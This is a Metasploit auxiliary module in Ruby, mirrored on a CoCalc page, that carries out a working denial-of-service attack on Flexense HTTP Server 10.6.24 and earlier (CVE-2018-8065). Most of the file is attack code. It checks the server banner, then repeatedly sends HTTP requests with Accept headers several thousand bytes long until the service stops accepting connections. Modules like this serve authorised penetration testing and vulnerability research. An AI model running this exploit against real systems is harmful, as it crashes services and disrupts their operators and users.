Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/flexense_http_server_dos.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Auxiliary::Dos

8
  include Msf::Exploit::Remote::Tcp

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Flexense HTTP Server Denial Of Service',

15
        'Description' => %q{

16
          This module triggers a Denial of Service vulnerability in the Flexense HTTP server.

17
          Vulnerability caused by a user mode write access memory violation and can be triggered with

18
          rapidly sending variety of HTTP requests with long HTTP header values.

19


20
          Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below versions reportedly vulnerable.

21
        },

22
        'Author' => [ 'Ege Balci <[email protected]>' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2018-8065'],

26
          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],

27
        ],

28
        'DisclosureDate' => '2018-03-09',

29
        'Notes' => {

30
          'Stability' => [CRASH_SERVICE_DOWN],

31
          'SideEffects' => [],

32
          'Reliability' => []

33
        }

34
      )

35
    )

36


37
    register_options(

38
      [

39
        Opt::RPORT(80),

40
        OptString.new('PacketCount', [ true, 'The number of packets to be sent (Recommended: Above 1725)', 1725 ]),

41
        OptString.new('PacketSize', [ true, 'The number of bytes in the Accept header (Recommended: 4088-5090', rand(4088..5090) ])

42
      ]

43
    )

44
  end

45


46
  def check

47
    connect

48
    sock.put("GET / HTTP/1.0\r\n\r\n")

49
    res = sock.get

50
    if res && res.include?('Flexense HTTP Server v10.6.24')

51
      Exploit::CheckCode::Appears

52
    else

53
      Exploit::CheckCode::Safe

54
    end

55
  rescue Rex::ConnectionRefused

56
    print_error('Target refused the connection')

57
    Exploit::CheckCode::Unknown

58
  rescue StandardError

59
    print_error('Target did not respond to HTTP request')

60
    Exploit::CheckCode::Unknown

61
  end

62


63
  def run

64
    unless check == Exploit::CheckCode::Appears

65
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')

66
    end

67


68
    size = datastore['PacketSize'].to_i

69
    print_status("Starting with packets of #{size}-byte strings")

70


71
    count = 0

72
    loop do

73
      payload = ''

74
      payload << 'GET /' + Rex::Text.rand_text_alpha(1..30) + " HTTP/1.1\r\n"

75
      payload << "Host: 127.0.0.1\r\n"

76
      payload << 'Accept: ' + ('A' * size) + "\r\n"

77
      payload << "\r\n\r\n"

78
      begin

79
        connect

80
        sock.put(payload)

81
        disconnect

82
        count += 1

83
        break if count == datastore['PacketCount']

84
      rescue ::Rex::InvalidDestination

85
        print_error('Invalid destination!  Continuing...')

86
      rescue ::Rex::ConnectionTimeout

87
        print_error('Connection timeout!  Continuing...')

88
      rescue ::Errno::ECONNRESET

89
        print_error('Connection reset!  Continuing...')

90
      rescue ::Rex::ConnectionRefused

91
        print_good("DoS successful after #{count} packets with #{size}-byte headers")

92
        return true

93
      end

94
    end

95
    print_error("DoS failed after #{count} packets of #{size}-byte strings")

96
  end

97
end

98


99